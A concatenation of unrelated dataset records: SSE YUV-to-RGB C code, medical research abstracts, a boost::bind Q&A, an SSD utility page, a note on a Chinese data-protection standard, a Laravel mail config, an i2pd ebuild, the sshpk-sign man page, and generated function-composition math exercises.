v4 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(v_ptr+48)), 24), 24); \
v = _mm_packus_epi16(_mm_packs_epi32(v1, v2), _mm_packs_epi32(v3, v4)); \
}
#elif YUV_FORMAT == YUV_FORMAT_NV12
#define READ_Y(y_ptr) \
y = LOAD_SI128((const __m128i*)(y_ptr)); \
#define READ_UV \
{ \
__m128i u1, u2, v1, v2; \
u1 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(u_ptr)), 8), 8); \
u2 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(u_ptr+16)), 8), 8); \
u = _mm_packus_epi16(u1, u2); \
v1 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(v_ptr)), 8), 8); \
v2 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(v_ptr+16)), 8), 8); \
v = _mm_packus_epi16(v1, v2); \
}
#else
#error READ_UV unimplemented
#endif
#define YUV2RGB_32 \
__m128i r_tmp, g_tmp, b_tmp; \
__m128i r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2; \
__m128i r_uv_16_1, g_uv_16_1, b_uv_16_1, r_uv_16_2, g_uv_16_2, b_uv_16_2; \
__m128i y_16_1, y_16_2; \
__m128i y, u, v, u_16, v_16; \
__m128i r_8_11, g_8_11, b_8_11, r_8_21, g_8_21, b_8_21; \
__m128i r_8_12, g_8_12, b_8_12, r_8_22, g_8_22, b_8_22; \
\
READ_UV \
\
/* process first 16 pixels of first line */\
u_16 = _mm_unpacklo_epi8(u, _mm_setzero_si128()); \
v_16 = _mm_unpacklo_epi8(v, _mm_setzero_si128()); \
u_16 = _mm_add_epi16(u_16, _mm_set1_epi16(-128)); \
v_16 = _mm_add_epi16(v_16, _mm_set1_epi16(-128)); \
\
UV2RGB_16(u_16, v_16, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
r_uv_16_1=r_16_1; g_uv_16_1=g_16_1; b_uv_16_1=b_16_1; \
r_uv_16_2=r_16_2; g_uv_16_2=g_16_2; b_uv_16_2=b_16_2; \
\
READ_Y(y_ptr1) \
y_16_1 = _mm_unpacklo_epi8(y, _mm_setzero_si128()); \
y_16_2 = _mm_unpackhi_epi8(y, _mm_setzero_si128()); \
\
ADD_Y2RGB_16(y_16_1, y_16_2, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
\
r_8_11 = _mm_packus_epi16(r_16_1, r_16_2); \
g_8_11 = _mm_packus_epi16(g_16_1, g_16_2); \
b_8_11 = _mm_packus_epi16(b_16_1, b_16_2); \
\
/* process first 16 pixels of second line */\
r_16_1=r_uv_16_1; g_16_1=g_uv_16_1; b_16_1=b_uv_16_1; \
r_16_2=r_uv_16_2; g_16_2=g_uv_16_2; b_16_2=b_uv_16_2; \
\
READ_Y(y_ptr2) \
y_16_1 = _mm_unpacklo_epi8(y, _mm_setzero_si128()); \
y_16_2 = _mm_unpackhi_epi8(y, _mm_setzero_si128()); \
\
ADD_Y2RGB_16(y_16_1, y_16_2, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
\
r_8_21 = _mm_packus_epi16(r_16_1, r_16_2); \
g_8_21 = _mm_packus_epi16(g_16_1, g_16_2); \
b_8_21 = _mm_packus_epi16(b_16_1, b_16_2); \
\
/* process last 16 pixels of first line */\
u_16 = _mm_unpackhi_epi8(u, _mm_setzero_si128()); \
v_16 = _mm_unpackhi_epi8(v, _mm_setzero_si128()); \
u_16 = _mm_add_epi16(u_16, _mm_set1_epi16(-128)); \
v_16 = _mm_add_epi16(v_16, _mm_set1_epi16(-128)); \
\
UV2RGB_16(u_16, v_16, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
r_uv_16_1=r_16_1; g_uv_16_1=g_16_1; b_uv_16_1=b_16_1; \
r_uv_16_2=r_16_2; g_uv_16_2=g_16_2; b_uv_16_2=b_16_2; \
\
READ_Y(y_ptr1+16*y_pixel_stride) \
y_16_1 = _mm_unpacklo_epi8(y, _mm_setzero_si128()); \
y_16_2 = _mm_unpackhi_epi8(y, _mm_setzero_si128()); \
\
ADD_Y2RGB_16(y_16_1, y_16_2, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
\
r_8_12 = _mm_packus_epi16(r_16_1, r_16_2); \
g_8_12 = _mm_packus_epi16(g_16_1, g_16_2); \
b_8_12 = _mm_packus_epi16(b_16_1, b_16_2); \
\
/* process last 16 pixels of second line */\
r_16_1=r_uv_16_1; g_16_1=g_uv_16_1; b_16_1=b_uv_16_1; \
r_16_2=r_uv_16_2; g_16_2=g_uv_16_2; b_16_2=b_uv_16_2; \
\
READ_Y(y_ptr2+16*y_pixel_stride) \
y_16_1 = _mm_unpacklo_epi8(y, _mm_setzero_si128()); \
y_16_2 = _mm_unpackhi_epi8(y, _mm_setzero_si128()); \
\
ADD_Y2RGB_16(y_16_1, y_16_2, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
\
r_8_22 = _mm_packus_epi16(r_16_1, r_16_2); \
g_8_22 = _mm_packus_epi16(g_16_1, g_16_2); \
b_8_22 = _mm_packus_epi16(b_16_1, b_16_2); \
\
void SSE_FUNCTION_NAME(uint32_t width, uint32_t height,
const uint8_t *Y, const uint8_t *U, const uint8_t *V, uint32_t Y_stride, uint32_t UV_stride,
uint8_t *RGB, uint32_t RGB_stride,
YCbCrType yuv_type)
{
const YUV2RGBParam *const param = &(YUV2RGB[yuv_type]);
#if YUV_FORMAT == YUV_FORMAT_420
const int y_pixel_stride = 1;
const int uv_pixel_stride = 1;
const int uv_x_sample_interval = 2;
const int uv_y_sample_interval = 2;
#elif YUV_FORMAT == YUV_FORMAT_422
const int y_pixel_stride = 2;
const int uv_pixel_stride = 4;
const int uv_x_sample_interval = 2;
const int uv_y_sample_interval = 1;
#elif YUV_FORMAT == YUV_FORMAT_NV12
const int y_pixel_stride = 1;
const int uv_pixel_stride = 2;
const int uv_x_sample_interval = 2;
const int uv_y_sample_interval = 2;
#endif
#if RGB_FORMAT == RGB_FORMAT_RGB565
const int rgb_pixel_stride = 2;
#elif RGB_FORMAT == RGB_FORMAT_RGB24
const int rgb_pixel_stride = 3;
#elif RGB_FORMAT == RGB_FORMAT_RGBA || RGB_FORMAT == RGB_FORMAT_BGRA || \
RGB_FORMAT == RGB_FORMAT_ARGB || RGB_FORMAT == RGB_FORMAT_ABGR
const int rgb_pixel_stride = 4;
#else
#error Unknown RGB pixel size
#endif
if (width >= 32) {
uint32_t xpos, ypos;
for(ypos=0; ypos<(height-(uv_y_sample_interval-1)); ypos+=uv_y_sample_interval)
{
const uint8_t *y_ptr1=Y+ypos*Y_stride,
*y_ptr2=Y+(ypos+1)*Y_stride,
*u_ptr=U+(ypos/uv_y_sample_interval)*UV_stride,
*v_ptr=V+(ypos/uv_y_sample_interval)*UV_stride;
uint8_t *rgb_ptr1=RGB+ypos*RGB_stride,
*rgb_ptr2=RGB+(ypos+1)*RGB_stride;
for(xpos=0; xpos<(width-31); xpos+=32)
{
YUV2RGB_32
{
PACK_PIXEL
SAVE_LINE1
if (uv_y_sample_interval > 1)
{
SAVE_LINE2
}
}
y_ptr1+=32*y_pixel_stride;
y_ptr2+=32*y_pixel_stride;
u_ptr+=32*uv_pixel_stride/uv_x_sample_interval;
v_ptr+=32*uv_pixel_stride/uv_x_sample_interval;
rgb_ptr1+=32*rgb_pixel_stride;
rgb_ptr2+=32*rgb_pixel_stride;
}
}
/* Catch the last line, if needed */
if (uv_y_sample_interval == 2 && ypos == (height-1))
{
const uint8_t *y_ptr=Y+ypos*Y_stride,
*u_ptr=U+(ypos/uv_y_sample_interval)*UV_stride,
*v_ptr=V+(ypos/uv_y_sample_interval)*UV_stride;
uint8_t *rgb_ptr=RGB+ypos*RGB_stride;
STD_FUNCTION_NAME(width, 1, y_ptr, u_ptr, v_ptr, Y_stride, UV_stride, rgb_ptr, RGB_stride, yuv_type);
}
}
/* Catch the right column, if needed */
{
int converted = (width & ~31);
if (converted != width)
{
const uint8_t *y_ptr=Y+converted*y_pixel_stride,
*u_ptr=U+converted*uv_pixel_stride/uv_x_sample_interval,
*v_ptr=V+converted*uv_pixel_stride/uv_x_sample_interval;
uint8_t *rgb_ptr=RGB+converted*rgb_pixel_stride;
STD_FUNCTION_NAME(width-converted, height, y_ptr, u_ptr, v_ptr, Y_stride, UV_stride, rgb_ptr, RGB_stride, yuv_type);
}
}
}
#undef SSE_FUNCTION_NAME
#undef STD_FUNCTION_NAME
#undef YUV_FORMAT
#undef RGB_FORMAT
#undef SSE_ALIGNED
#undef LOAD_SI128
#undef SAVE_SI128
#undef UV2RGB_16
#undef ADD_Y2RGB_16
#undef PACK_RGB24_32_STEP1
#undef PACK_RGB24_32_STEP2
#undef PACK_RGB24_32
#undef PACK_RGBA_32
#undef PACK_PIXEL
#undef SAVE_LINE1
#undef SAVE_LINE2
#undef READ_Y
#undef READ_UV
#undef YUV2RGB_32
|
{
"pile_set_name": "Github"
}
|
The objectives of this study are 1) to test a group treatment program for women patients with borderline personality disorder (BPD) designed to decrease borderline symptoms and improve social functioning, and 2) to add to the understanding of the psychopathology of BPD by exploring a "level of emotional awareness" model to conceptualize its learning deficits. The specific aims of the proposed study are: 1) to test the efficacy of an 8-month, psychoeducation treatment program adjunctive to individual psychotherapy in reducing BPD symptoms, 2) to identify the characteristics of patients able to benefit from such treatments, 3) to explore treatment's mechanism of action, 4) to produce a treatment manual for the program, and 5) to provide training in the treatment of BPD. Forty-eight subjects who meet criteria for a BPD diagnosis using DSM-III-R, the Diagnostic Interview for Borderlines (DIB) and the Borderline Syndrome Index (BSI) will be randomly assigned to the treatment and waiting list control groups. The program's content is based on the deficits in emotional awareness, regulation, and expression and the consequent social, communication, and problem-solving skills like increased awareness of emotions, distress reduction, anger management, and need identification. It then moves on to interpersonal skills like emotional expression, communication, and conflict management. Treatment outcome measures include self-report (Symptom Checklist-90 SCL-90), Social Adjustment Scale-Revised), and structured interview measures DBI, Alexithymia Provoked Response Questionnaire). These measures will be given pre-treatment, post-treatment, and at a 6- month followup. A pilot study with nine subjects randomly assigned to treatment group and control provides strong support for the efficacy of this treatment program and the merit of a larger trial. Treatment group members improved significantly on all outcome measures (SCL-90, BSI, and Global Assessment of Functioning (GAF), while control subjects did not change significantly. This study will contribute to the much needed empirical evaluation of time-limited psychosocial group treatment for this difficult population.
|
{
"pile_set_name": "NIH ExPorter"
}
|
Q:
Using boost::bind to create a function object binding a auto-release "heap" resource
I try to use boost::bind to create a function object, as well, I want to bind a object created on the HEAP to it for a delay call. The example code like below:
#include <boost/function.hpp>
#include <boost/bind.hpp>
#include <boost/noncopyable.hpp>
#include <boost/smart_ptr.hpp>
#include <boost/typeof/typeof.hpp>
#include <iostream>
using namespace boost;
class CTest : public noncopyable
{
public:
CTest():mInt(0){ std::cout << "constructor" << std::endl; }
~CTest(){ std::cout << "destructor" << std::endl; }
int mInt;
};
int getM( CTest * t )
{
return t->mInt;
}
function<int()> makeF()
{
// create some resource on HEAP, not on STACK.
// cause the STACK resource will be release after
// function return.
BOOST_AUTO( a , make_shared<CTest>() );
// I want to use bind to create a function call
// wrap the original function and the resource I create
// for delay call.
//
// I use shared_ptr to auto release the resource when
// the function object is gone.
//
// Compile ERROR!!!
// cannot convert parameter 1 from 'boost::shared_ptr<T>' to 'CTest *'
//
return bind<int>( getM , a );
}
int main(int argc, char* argv[])
{
BOOST_AUTO( delayFunc , makeF() );
delayFunc();
return 0;
}
The above is just a example code. But I think it shows what I want and the current error is.
Currently, I think I can only use a function object to wrap the original function like below:
class CGetM
{
public:
typedef int result_type;
int operator() ( shared_ptr<CTest> t )
{
return getM( t.get() );
}
};
And replace the code like this:
return bind<int>( CGetM() , a );
However, if currently I have many original function like getM, for adapting the correct arguments, wrapping it in a function object is really a large job. I don't know if there is some kind of tips or other useful util class in boost can handle such case more intelligently and elegantly ?
So any suggestion is appreciated. Thanks.
A:
You need to use bind composition:
return bind<int>( getM, bind(&shared_ptr<CTest>::get, a) );
|
{
"pile_set_name": "StackExchange"
}
|
Matricellular proteins in the heart: possible role during stress and remodeling.
Matricellular proteins are extracellular matrix proteins that modulate cell-matrix interactions and cell function, and do not seem to have a direct structural role. The family includes tenascin-C (TN-C), tenascin-X (TN-X), osteonectin, osteopontin, thrombospondin-1 (TSP1) and thrombospondin-2 (TSP2). Expression of matricellular proteins is high during embryogenesis, but almost absent during normal postnatal life. Interestingly, it re-appears in response to injury. Left ventricular remodeling is a complicated process that occurs in the stressed heart, and is still not completely understood. Several members of the matricellular protein family, like tenascin-C, osteopontin, and osteonectin are up-regulated after cardiac injury. Therefore, this group of proteins may have crucial functions in the heart coping with stress. This review will focus on the expression, regulation and function of these matricellular proteins, and will discuss the crucial functions that these proteins might exert during remodeling of the stressed heart.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
BDEPEND=dev-util/ninja dev-util/cmake virtual/pkgconfig
DEFINED_PHASES=compile configure install postinst prepare pretend test
DEPEND=acct-user/i2pd acct-group/i2pd !static? ( dev-libs/boost:=[threads] !libressl? ( dev-libs/openssl:0=[-bindist] ) libressl? ( dev-libs/libressl:0= ) upnp? ( net-libs/miniupnpc:= ) ) static? ( dev-libs/boost:=[static-libs,threads] sys-libs/zlib[static-libs] !libressl? ( dev-libs/openssl:0=[static-libs] ) libressl? ( dev-libs/libressl:0=[static-libs] ) upnp? ( net-libs/miniupnpc:=[static-libs] ) )
DESCRIPTION=A C++ daemon for accessing the I2P anonymous network
EAPI=7
HOMEPAGE=https://github.com/PurpleI2P/i2pd
IUSE=cpu_flags_x86_aes cpu_flags_x86_avx i2p-hardening libressl static +upnp
KEYWORDS=~amd64 ~arm ~arm64 ~ia64 ~ppc ~ppc64 ~sparc ~x86
LICENSE=BSD
RDEPEND=acct-user/i2pd acct-group/i2pd !static? ( dev-libs/boost:=[threads] !libressl? ( dev-libs/openssl:0=[-bindist] ) libressl? ( dev-libs/libressl:0= ) upnp? ( net-libs/miniupnpc:= ) )
SLOT=0
SRC_URI=https://github.com/PurpleI2P/i2pd/archive/2.33.0.tar.gz -> i2pd-2.33.0.tar.gz
_eclasses_=cmake 9f6da23aab151395c55f018fb13a11b2 edos2unix 33e347e171066657f91f8b0c72ec8773 eutils 2d5b3f4b315094768576b6799e4f926e flag-o-matic 09a8beb8e6a8e02dc1e1bd83ac353741 l10n 8cdd85e169b835d518bc2fd59f780d8e multilib 98584e405e2b0264d37e8f728327fed1 multiprocessing cac3169468f893670dac3e7cb940e045 ninja-utils 132cbb376048d079b5a012f5467c4e7f systemd 69be00334d73f9f50261554b94be0879 toolchain-funcs 605c126bed8d87e4378d5ff1645330cb wrapper 4251d4c84c25f59094fd557e0063a974 xdg-utils ff2ff954e6b17929574eee4efc5152ba
_md5_=b32fbd0eff5b30690300ae3200f11299
|
{
"pile_set_name": "Github"
}
|
Filter by:
90% Complete
Part 4: Download
Step 1: Enable Storage Executive
This free software helps your SSD become even faster and allows the drive to get periodic performance updates. On the computer you installed the SSD in, go to crucial.com/se.
Step 2: Click on one of the “download” buttons
Download times will vary based on your internet connection, but average 1-3 minutes.
Step 3: Install and run Storage Executive
Click on the file you just downloaded. If it doesn’t open right away, double-click on it, then save it to your desktop and open it from there. Follow the onscreen prompts and instructions to install and start using the software.
Step 4: Enable Momentum Cache and make your SSD even faster
In the left menu, click on Momentum Cache. Enabling this feature forces your computer to restart, which is normal. The feature doesn’t work with RAID arrays.
Storage Executive is the easy way to manage your SSD. You can use it to see how much data is on your drive, monitor its temperature, allow encryption, and enable the Momentum Cache feature, which makes many SSD operations up to 10x faster.
Get all the latest offers, articles & new products straight to your inbox
|
{
"pile_set_name": "Pile-CC"
}
|
Influence of standard RF coil materials on surface and buildup dose from a 6 MV photon beam in magnetic field.
Magnetic resonance guided teletherapy systems aspire to image the patient concurrently with the radiation delivery. Thus, the radiofrequency (RF) coils used for magnetic resonance imaging, placed on or close to patient skin and in close proximity to the treatment volume, would be irradiated leading to modifications of radiation dose to the skin and in the buildup region. The purpose of this work is to measure and assess these dose modifications due to standard off-the-shelf RF coil materials. A typical surface coil was approximated as layered sheets of polycarbonate, copper tape, and Teflon to emulate the base, conductor, and cover, respectively. A separate investigation used additional coil materials, such as copper pipe, plastic coil housing, a typical coil padding material, and a thin copper conductor. The materials were placed in the path of a 6 MV photon beam at various distances from polystyrene phantoms in which the surface and buildup doses were measured. The experiments were performed on a clinical Varian linac with no magnetic field and with a 0.21 T electromagnet producing a magnetic field parallel to the beam central axis. The authors repeated similar experiments in the presence of a 0.22 T magnetic field oriented perpendicular to the beam central axis using an earlier linac-MR prototype, with a biplanar permanent magnet. The radiation detectors used for the measurements were two different parallel plate ion chambers and GAFChromic films. A typical open beam surface dose of 20% (relative to open beam Dmax) was increased to 63% by the coil padding material and to >74% by all other materials when placed in direct contact with the phantom, irrespective of magnetic field presence or orientation. Without a magnetic field, the surface dose decreased as the test materials were moved away from the phantom surface toward the radiation source, reaching between 30% and 40% at 10 cm gap between the phantom and the test materials. In the presence of the transverse magnetic field, the surface dose reduction was more rapid reaching a dose level of 30%-40% with only 3-4 cm gap. In the presence of the parallel magnetic field, as expected, the surface dose did not decrease considerably as the gap between the phantom surface and test materials was increased; the surface dose remained >60% at 10 cm gap for all tested materials except for the thin copper conductor. As expected, placing coil materials in direct contact with the phantom surface increases the surface dose considerably. The surface dose is reduced by creating a gap between the coil materials and phantom surface. This dose reduction happens more rapidly in the presence of a transverse magnetic field. However, the surface dose stays relatively large irrespective of the gap in the presence of a parallel magnetic field. Thus, the standard, off-the-shelf RF coils should be used with caution in integrated linac-MR systems, especially those using a parallel magnetic field orientation in which case the RF coils will probably need to be reconfigured to create open ports for the radiation beam.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
On 29 December 2017, the National Information Security Standardization Technical Committee (TC 260), which is jointly administered by the Cyberspace Administration of China and the Standardization Administration of China, issued the Information Security Technology – Personal Information Security Specifications, which will take effect 1 May 2018.
The standard marks another step in China's efforts to develop a comprehensive data protection regime, with significant implications for cross-border interoperability.
Key aspects of the standard include:
• Clarifying the rights of personal data subjects and requiring a higher level of protection for "personal sensitive information" than for ordinary "personal information".
• Requiring data controllers to obtain "explicit consent", that is, written consent or other affirmative action by a personal data subject, such as electronically clicking to consent, before collecting and using personal sensitive information.
|
{
"pile_set_name": "Pile-CC"
}
|
<?php
return [
/*
|--------------------------------------------------------------------------
| Mail Driver
|--------------------------------------------------------------------------
|
| Laravel supports both SMTP and PHP's "mail" function as drivers for the
| sending of e-mail. You may specify which one you're using throughout
| your application here. By default, Laravel is setup for SMTP mail.
|
| Supported: "smtp", "sendmail", "mailgun", "mandrill", "ses",
| "sparkpost", "log", "array"
|
*/
'driver' => env('MAIL_DRIVER', 'smtp'),
/*
|--------------------------------------------------------------------------
| SMTP Host Address
|--------------------------------------------------------------------------
|
| Here you may provide the host address of the SMTP server used by your
| applications. A default option is provided that is compatible with
| the Mailgun mail service which will provide reliable deliveries.
|
*/
'host' => env('MAIL_HOST', 'smtp.mailgun.org'),
/*
|--------------------------------------------------------------------------
| SMTP Host Port
|--------------------------------------------------------------------------
|
| This is the SMTP port used by your application to deliver e-mails to
| users of the application. Like the host we have set this value to
| stay compatible with the Mailgun e-mail application by default.
|
*/
'port' => env('MAIL_PORT', 587),
/*
|--------------------------------------------------------------------------
| Global "From" Address
|--------------------------------------------------------------------------
|
| You may wish for all e-mails sent by your application to be sent from
| the same address. Here, you may specify a name and address that is
| used globally for all e-mails that are sent by your application.
|
*/
'from' => [
'address' => env('MAIL_FROM_ADDRESS', 'hello@example.com'),
'name' => env('MAIL_FROM_NAME', 'Example'),
],
/*
|--------------------------------------------------------------------------
| E-Mail Encryption Protocol
|--------------------------------------------------------------------------
|
| Here you may specify the encryption protocol that should be used when
| the application send e-mail messages. A sensible default using the
| transport layer security protocol should provide great security.
|
*/
'encryption' => env('MAIL_ENCRYPTION', 'tls'),
/*
|--------------------------------------------------------------------------
| SMTP Server Username
|--------------------------------------------------------------------------
|
| If your SMTP server requires a username for authentication, you should
| set it here. This will get used to authenticate with your server on
| connection. You may also set the "password" value below this one.
|
*/
'username' => env('MAIL_USERNAME'),
'password' => env('MAIL_PASSWORD'),
/*
|--------------------------------------------------------------------------
| Sendmail System Path
|--------------------------------------------------------------------------
|
| When using the "sendmail" driver to send e-mails, we will need to know
| the path to where Sendmail lives on this server. A default path has
| been provided here, which will work well on most of your systems.
|
*/
'sendmail' => '/usr/sbin/sendmail -bs',
/*
|--------------------------------------------------------------------------
| Markdown Mail Settings
|--------------------------------------------------------------------------
|
| If you are using Markdown based email rendering, you may configure your
| theme and component paths here, allowing you to customize the design
| of the emails. Or, you may simply stick with the Laravel defaults!
|
*/
'markdown' => [
'theme' => 'default',
'paths' => [
resource_path('views/vendor/mail'),
],
],
];
|
{
"pile_set_name": "Github"
}
|
.TH sshpk\-sign 1 "Jan 2016" sshpk "sshpk Commands"
.SH NAME
.PP
sshpk\-sign \- sign data using an SSH key
.SH SYNOPSYS
.PP
\fB\fCsshpk\-sign\fR \-i KEYPATH [OPTION...]
.SH DESCRIPTION
.PP
Takes in arbitrary bytes, and signs them using an SSH private key. The key can
be of any type or format supported by the \fB\fCsshpk\fR library, including the
standard OpenSSH formats, as well as PEM PKCS#1 and PKCS#8.
.PP
The signature is printed out in Base64 encoding, unless the \fB\fC\-\-binary\fR or \fB\fC\-b\fR
option is given.
.SH EXAMPLES
.PP
Signing with default settings:
.PP
.RS
.nf
$ printf 'foo' | sshpk\-sign \-i ~/.ssh/id_ecdsa
MEUCIAMdLS/vXrrtWFepwe...
.fi
.RE
.PP
Signing in SSH (RFC 4253) format (rather than the default ASN.1):
.PP
.RS
.nf
$ printf 'foo' | sshpk\-sign \-i ~/.ssh/id_ecdsa \-t ssh
AAAAFGVjZHNhLXNoYTIt...
.fi
.RE
.PP
Saving the binary signature to a file:
.PP
.RS
.nf
$ printf 'foo' | sshpk\-sign \-i ~/.ssh/id_ecdsa \\
\-o signature.bin \-b
$ cat signature.bin | base64
MEUCIAMdLS/vXrrtWFepwe...
.fi
.RE
.SH OPTIONS
.TP
\fB\fC\-v, \-\-verbose\fR
Print extra information about the key and signature to stderr when signing.
.TP
\fB\fC\-b, \-\-binary\fR
Don't base64\-encode the signature before outputting it.
.TP
\fB\fC\-i KEY, \-\-identity=KEY\fR
Select the key to be used for signing. \fB\fCKEY\fR must be a relative or absolute
filesystem path to the key file. Any format supported by the \fB\fCsshpk\fR library
is supported, including OpenSSH formats and standard PEM PKCS.
.TP
\fB\fC\-f PATH, \-\-file=PATH\fR
Input file to sign instead of stdin.
.TP
\fB\fC\-o PATH, \-\-out=PATH\fR
Output file to save signature in instead of stdout.
.TP
\fB\fC\-H HASH, \-\-hash=HASH\fR
Set the hash algorithm to be used for signing. This should be one of \fB\fCsha1\fR,
\fB\fCsha256\fR or \fB\fCsha512\fR\&. Some key types may place restrictions on which hash
algorithms may be used (e.g. ED25519 keys can only use SHA\-512).
.TP
\fB\fC\-t FORMAT, \-\-format=FORMAT\fR
Choose the signature format to use, from \fB\fCasn1\fR, \fB\fCssh\fR or \fB\fCraw\fR (only for
ED25519 signatures). The \fB\fCasn1\fR format is the default, as it is the format
used with TLS and typically the standard in most non\-SSH libraries (e.g.
OpenSSL). The \fB\fCssh\fR format is used in the SSH protocol and by the ssh\-agent.
.SH SEE ALSO
.PP
.BR sshpk-verify (1)
.SH BUGS
.PP
Report bugs at Github
\[la]https://github.com/arekinath/node-sshpk/issues\[ra]
|
{
"pile_set_name": "Github"
}
|
*m + 0*m - 19*m. Let p(t) = -1552*t. What is u(p(i))?
-1552*i
Let h(z) = 4*z. Let r = -101 - -97. Let x be (-2 - r)/(-2)*(-11 + 3). Let v(y) = 11*y. Let f(o) = x*h(o) - 3*v(o). Let s(l) = 7*l. Determine s(f(d)).
-7*d
Let x(l) = 7*l + 1. Let p(q) = 65*q**2 + 4*q - 37. Give p(x(g)).
3185*g**2 + 938*g + 32
Suppose -28*q - 424 = -20*q. Let l = 55 + q. Let z(g) = 3*g**2 - 22*g - 4*g**l + 22*g. Let i(s) = 9*s**2. Determine z(i(m)).
-81*m**4
Let z(b) = 1027*b**2 + 91*b + 273. Let c(g) = 34*g**2 + 3*g + 9. Let k(f) = 91*c(f) - 3*z(f). Let a(j) = 3*j**2 - 14*j**2 - 7 + 7. Calculate a(k(n)).
-1859*n**4
Let x(d) = 303247*d. Let c(i) = -28*i. Give c(x(k)).
-8490916*k
Let w(g) = -741*g - 2340. Let q(j) = -3*j - 10. Let l(a) = -1170*q(a) + 5*w(a). Let r(b) = 14*b - 2. Determine l(r(d)).
-2730*d + 390
Let t(l) = 5*l**2. Let y(v) = 68*v**2 - 3*v - 3. Let x(h) = 10335*h**2 - 455*h - 455. Let c(d) = -3*x(d) + 455*y(d). Give c(t(i)).
-1625*i**4
Let z(p) = 11*p**2. Let f(r) = -13*r + 53*r - 24*r. Give z(f(b)).
2816*b**2
Let c(q) = -6879*q. Let h(j) = 5535*j. What is h(c(g))?
-38075265*g
Let q(w) = -39*w - 40*w - 50*w + 126*w. Let l(g) = 90*g**2 - 9*g + 9. Let y(p) = p**2 - p + 1. Let x(o) = l(o) - 9*y(o). What is q(x(r))?
-243*r**2
Let r(g) = 9*g**2 + 10*g + 5. Let q = -7 - -12. Let j(t) = 91*t**2 + 98*t + 49. Let h(m) = q*j(m) - 49*r(m). Let n(w) = 9*w. Determine n(h(x)).
126*x**2
Let g(k) be the first derivative of -65 - k - 7*k**2 + 10*k**2 - 3*k**2 + 14*k**3. Let u(n) = n. Determine u(g(t)).
42*t**2 - 1
Let u(j) = -438308*j. Let o(l) = l**2 - 6. What is u(o(y))?
-438308*y**2 + 2629848
Let p(a) be the third derivative of -31*a**4/12 - 2*a**2. Let f(h) = -64*h + 112*h - 51*h + 2 - 2. Calculate f(p(d)).
186*d
Let w(f) be the first derivative of -15235*f**2/2 + 754. Let q(m) = m**2. Determine q(w(d)).
232105225*d**2
Let b = 97 + -25. Let v(s) = -s + 1. Let t = -4 + 3. Let g(z) = -60*z + 72. Let k(i) = b*v(i) + t*g(i). Let r(d) = -d. Determine k(r(u)).
12*u
Let t(p) = 3*p**2. Suppose 4*z = -4*r + 7*z + 27, 25 = -5*z. Let g(c) be the first derivative of 0*c**3 + r*c**3 + 26 - 17 - 2*c**3. Calculate t(g(i)).
27*i**4
Let h(z) = 5*z. Let j(g) = -2687868*g**2. Determine h(j(r)).
-13439340*r**2
Let c(s) = -1322*s**2 + 2. Let n(p) be the third derivative of -p**4/12 - 6863*p**2. Determine c(n(x)).
-5288*x**2 + 2
Let s(y) = 9*y - 1403. Let z(u) = u - 165. Let v(r) = 6*s(r) - 51*z(r). Let o(t) = 2*t + 14*t**2 - 2*t - 7*t**2. What is o(v(f))?
63*f**2 - 126*f + 63
Let g(f) = 4*f**2. Let a(n) be the third derivative of 3437*n**4/24 + 2*n**2 - n + 129. Determine a(g(l)).
13748*l**2
Let h(d) = 5*d + 5. Let y(u) = 346*u + 1. Determine h(y(q)).
1730*q + 10
Let f(h) = 730*h**2 + 1. Let o(y) be the second derivative of -y**3/6 + 97*y - 15. What is o(f(s))?
-730*s**2 - 1
Let i(g) be the second derivative of -g**4/6 + 342*g. Let y(w) = -295*w - 5. What is y(i(l))?
590*l**2 - 5
Let d(y) = 11*y - 10*y - 5*y + 317*y**2 - 312*y**2. Let h(r) = r**2 + 17 - 17. Calculate h(d(m)).
25*m**4 - 40*m**3 + 16*m**2
Let y(z) = -3*z. Let a(p) = -62*p**2 - 1323*p - 21. What is a(y(r))?
-558*r**2 + 3969*r - 21
Let m(o) = 418*o**2 + 1. Let b(l) = -13*l + 20. Let v(t) = -3*t + 5. Let k(d) = b(d) - 4*v(d). Determine m(k(f)).
418*f**2 + 1
Let g(p) = 5*p**2 + 2. Let o(m) = -m**2 + 15*m - 34. Let y be o(12). Let n(l) = -14*l**2 - 7. Let z(k) = y*n(k) + 7*g(k). Let v(a) = -13*a**2. What is z(v(s))?
1183*s**4
Let f(z) be the third derivative of 13*z**8/20160 - z**6/720 - 3*z**5/2 - 106*z**2. Let l(k) be the third derivative of f(k). Let r(o) = 4*o. Determine r(l(t)).
52*t**2 - 4
Let b(q) = 3396926*q**2. Let i(c) = -9*c**2. What is b(i(j))?
275151006*j**4
Let w(s) = 2*s**2. Let b(a) = -134*a**2 - 107934. Determine b(w(h)).
-536*h**4 - 107934
Let p(v) = 133*v + 4. Let w(t) = 132*t + 5. Let x(j) = 6*p(j) - 5*w(j). Let o(m) = 4311 - 2290 + 2*m - 2021. What is x(o(h))?
276*h - 1
Let o(h) = 314*h. Let y(z) = -506*z**2 + z. Calculate o(y(i)).
-158884*i**2 + 314*i
Let p(k) = -3*k. Let l(x) be the second derivative of -29*x**4/2 + x**2/2 - 1699*x. Give p(l(j)).
522*j**2 - 3
Let g(u) = -4*u**2 + 22. Let t(s) be the first derivative of 11*s**2/2 + 747. What is t(g(x))?
-44*x**2 + 242
Let g(y) = 8*y. Let n(c) = 0*c + 185*c**2 + 0*c - 43*c**2 + 12*c**2. Determine n(g(f)).
9856*f**2
Let c(a) = 8*a + 10 + 2*a - 7. Let r(t) = 119*t + 35. Let p(g) = -35*c(g) + 3*r(g). Let z(f) be the second derivative of -f**4/3 + 602*f. Determine p(z(k)).
-28*k**2
Suppose -m + 17 = o + 4*o, -5*o + 15 = 0. Let c(l) be the third derivative of l**4 + 3*l**4 + 3*l**m - 5*l**4. Let y(v) = v. Determine y(c(i)).
-24*i
